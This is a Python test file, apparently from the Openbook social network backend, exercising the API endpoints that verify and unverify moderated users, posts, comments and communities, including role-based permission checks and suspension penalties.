def test_verifying_rejected_user_moderated_object_does_not_place_suspension_penalty_on_user(self):
"""
verifying a rejected user moderated object should not place a suspension penalty on the user
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
report_category = make_moderation_category()
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertFalse(ModerationPenalty.objects.filter(
moderated_object_id=moderated_object.pk,
user_id=user.pk,
expiration__isnull=False
).exists())
def test_verifying_approved_user_moderated_object_places_suspension_penalty_on_user(self):
"""
verifying an approved user moderated object should place a suspension penalty on the user
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
user = make_user()
report_category = make_moderation_category()
reporter_user.report_user(user=user, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModerationPenalty.objects.filter(
moderated_object_id=moderated_object.pk,
user_id=user.pk,
expiration__isnull=False
).exists())
def test_verifying_approved_post_moderated_object_places_suspension_penalty_on_creator(self):
"""
verifying an approved post moderated object should place a suspension penalty on the creator
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
post_creator = make_user()
post = post_creator.create_public_post(text=make_fake_post_text())
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModerationPenalty.objects.filter(
moderated_object_id=moderated_object.pk,
user_id=post_creator.pk,
expiration__isnull=False
).exists())
def test_verifying_approved_community_moderated_object_places_suspension_penalty_on_staff(self):
"""
verifying an approved community moderated object should place a suspension penalty on the staff
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(username=community_moderator.username,
community_name=community.name)
community_administrator = make_user()
community_administrator.join_community_with_name(community_name=community.name)
community_creator.add_administrator_with_username_to_community_with_name(
username=community_administrator.username,
community_name=community.name)
report_category = make_moderation_category()
reporter_user.report_community(community=community, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(3, ModerationPenalty.objects.filter(
moderated_object_id=moderated_object.pk,
user_id__in=[community_creator.pk, community_moderator.pk, community_administrator.pk],
expiration__isnull=False
).count())
def test_verifying_approved_post_comment_moderated_object_places_suspension_penalty_on_creator(self):
"""
verifying an approved post comment moderated object should place a suspension penalty on the creator
"""
global_moderator = make_global_moderator()
reporter_user = make_user()
post_comment_creator = make_user()
post = post_comment_creator.create_public_post(text=make_fake_post_text())
post_comment = post_comment_creator.comment_post(post=post, text=make_fake_post_comment_text())
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post_comment=post_comment, post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModerationPenalty.objects.filter(
moderated_object_id=moderated_object.pk,
user_id=post_comment_creator.pk,
expiration__isnull=False
).exists())
def test_can_verify_moderated_object_if_global_moderator_and_approved(self):
"""
should be able to verify a user moderated object if global moderator and approved
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=True
).exists())
def test_can_verify_moderated_object_if_global_moderator_and_rejected(self):
"""
should be able to verify a user moderated object if global moderator and rejected
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=True
).exists())
def test_cant_verify_moderated_object_if_global_moderator_and_pending(self):
"""
should not be able to verify a user moderated object if global moderator and pending
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
status=ModeratedObject.STATUS_PENDING,
verified=False
).exists())
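The three verify tests above imply a simple precondition: a moderated object can be verified only after it has been approved or rejected, never while still pending. A minimal sketch of that gate; the `Status` enum and `can_verify` helper are hypothetical illustrations, not the actual model API:

```python
from enum import Enum

class Status(Enum):
    PENDING = 'P'
    APPROVED = 'A'
    REJECTED = 'R'

def can_verify(status):
    # Mirrors the tests: verifying an approved or rejected object succeeds
    # (HTTP 200), while verifying a pending one is refused (HTTP 400).
    return status in (Status.APPROVED, Status.REJECTED)
```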
def test_cant_verify_user_moderated_object_if_community_moderator(self):
"""
should not be able to verify a user moderated object if community moderator
"""
global_moderator = make_global_moderator()
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=False
).exists())
def test_cant_verify_user_moderated_object_if_regular_user(self):
"""
should not be able to verify a user moderated object if regular user
"""
regular_user = make_user()
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=False
).exists())
def test_can_verify_community_moderated_object_if_global_moderator(self):
"""
should be able to verify a community moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
verified=True
).exists())
def test_cant_verify_community_moderated_object_if_community_moderator(self):
"""
should not be able to verify a community moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
# report a different community than the one the moderator belongs to;
# community moderators cannot verify any community moderated object
reported_community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=reported_community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=reported_community,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=reported_community.pk,
verified=False
).exists())
def test_cant_verify_community_moderated_object_if_regular_user(self):
"""
should not be able to verify a community moderated object if regular user
"""
regular_user = make_user()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
verified=False
).exists())
def test_can_verify_community_post_moderated_object_if_global_moderator(self):
"""
should be able to verify a community_post moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
verified=True
).exists())
def test_cant_verify_community_post_moderated_object_if_community_moderator(self):
"""
should not be able to verify a community_post moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
verified=False
).exists())
def test_cant_verify_community_post_moderated_object_if_regular_user(self):
"""
should not be able to verify a community_post moderated object if regular user
"""
regular_user = make_user()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
verified=False
).exists())
def test_can_verify_community_post_comment_moderated_object_if_global_moderator(self):
"""
should be able to verify a community_post_comment moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
verified=True
).exists())
def test_cant_verify_community_post_comment_moderated_object_if_community_moderator(self):
"""
should not be able to verify a community_post_comment moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
verified=False
).exists())
def test_cant_verify_community_post_comment_moderated_object_if_regular_user(self):
"""
should not be able to verify a community_post_comment moderated object if regular user
"""
regular_user = make_user()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
verified=False
).exists())
def test_creates_verified_changed_log_on_verify(self):
"""
should create a verified changed log on verify
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, ModeratedObjectVerifiedChangedLog.objects.filter(
changed_from=False,
changed_to=True,
log__actor_id=global_moderator.pk,
log__moderated_object__object_id=user.pk
).count())
def test_on_critical_severity_post_moderated_object_verify_should_delete_image(self):
"""
verifying a critical-severity post moderated object should delete the post image
"""
global_moderator = make_global_moderator()
post_creator = make_user()
image = Image.new('RGB', (100, 100))
tmp_file = tempfile.NamedTemporaryFile(suffix='.jpg')
image.save(tmp_file)
tmp_file.seek(0)
post = post_creator.create_public_post(text=make_fake_post_text(), image=File(tmp_file))
reporter_user = make_user()
report_category = make_moderation_category(severity=ModerationCategory.SEVERITY_CRITICAL)
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
post.refresh_from_db()
with self.assertRaises(FileNotFoundError):
    # the image file should have been deleted on verify, so accessing it raises
    post.image.image.file
def _get_url(self, moderated_object):
return reverse('verify-moderated-object', kwargs={
'moderated_object_id': moderated_object.pk
})
def _get_moderation_category_severities(self):
return (
ModerationCategory.SEVERITY_CRITICAL,
ModerationCategory.SEVERITY_HIGH,
ModerationCategory.SEVERITY_MEDIUM,
ModerationCategory.SEVERITY_LOW,
)
class UnverifyModeratedObjectApiTests(OpenbookAPITestCase):
"""
UnverifyModeratedObjectApi
"""
def test_can_unverify_user_moderated_object_if_global_moderator_and_approved(self):
"""
should be able to unverify a user moderated object if global moderator and approved
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=False
).exists())
def test_can_unverify_user_moderated_object_if_global_moderator_and_rejected(self):
"""
should be able to unverify a user moderated object if global moderator and rejected
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=False
).exists())
def test_cant_unverify_user_moderated_object_if_community_moderator(self):
"""
should not be able to unverify a user moderated object if community moderator
"""
global_moderator = make_global_moderator()
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=True
).exists())
def test_cant_unverify_user_moderated_object_if_regular_user(self):
"""
should not be able to unverify a user moderated object if regular user
"""
regular_user = make_user()
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=user.pk,
verified=True
).exists())
def test_can_unverify_community_moderated_object_if_global_moderator(self):
"""
should be able to unverify a community moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
verified=False
).exists())
def test_cant_unverify_community_moderated_object_if_community_moderator(self):
"""
should not be able to unverify a community moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username
)
# report a different community than the one the moderator belongs to;
# community moderators cannot unverify any community moderated object
reported_community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=reported_community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=reported_community,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=reported_community.pk,
verified=True
).exists())
def test_cant_unverify_community_moderated_object_if_regular_user(self):
"""
should not be able to unverify a community moderated object if regular user
"""
regular_user = make_user()
community = make_community()
reporter_community = make_user()
report_category = make_moderation_category()
reporter_community.report_community(community=community,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community.pk,
verified=True
).exists())
def test_can_unverify_community_post_moderated_object_if_global_moderator(self):
"""
should be able to unverify a community_post moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
verified=False
).exists())
def test_cant_unverify_community_post_moderated_object_if_community_moderator(self):
"""
should not be able to unverify a community_post moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
verified=True
).exists())
def test_cant_unverify_community_post_moderated_object_if_regular_user(self):
"""
should not be able to unverify a community_post moderated object if regular user
"""
regular_user = make_user()
community = make_community()
community_post_creator = make_user()
community_post_creator.join_community_with_name(community_name=community.name)
community_post = community_post_creator.create_community_post(community_name=community.name,
text=make_fake_post_text())
reporter_community_post = make_user()
report_category = make_moderation_category()
reporter_community_post.report_post(post=community_post,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(
post=community_post,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(regular_user)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post.pk,
verified=True
).exists())
def test_can_unverify_community_post_comment_moderated_object_if_global_moderator(self):
"""
should be able to unverify a community_post_comment moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
verified=False
).exists())
def test_cant_unverify_community_post_comment_moderated_object_if_community_moderator(self):
"""
should not be able to unverify a community_post_comment moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
community_name=community.name,
username=community_moderator.username
)
community_post_comment_creator = make_user()
community_post_comment_creator.join_community_with_name(community_name=community.name)
community_post = community_post_comment_creator.create_community_post(
community_name=community.name,
text=make_fake_post_text())
community_post_comment = community_post_comment_creator.comment_post(
post=community_post,
text=make_fake_post_text())
reporter_community_post_comment = make_user()
report_category = make_moderation_category()
reporter_community_post_comment.report_comment_for_post(post=community_post,
post_comment=community_post_comment,
category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(
post_comment=community_post_comment,
category_id=report_category.pk)
global_moderator = make_global_moderator()
global_moderator.approve_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.post(url, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
object_id=community_post_comment.pk,
verified=True
).exists())
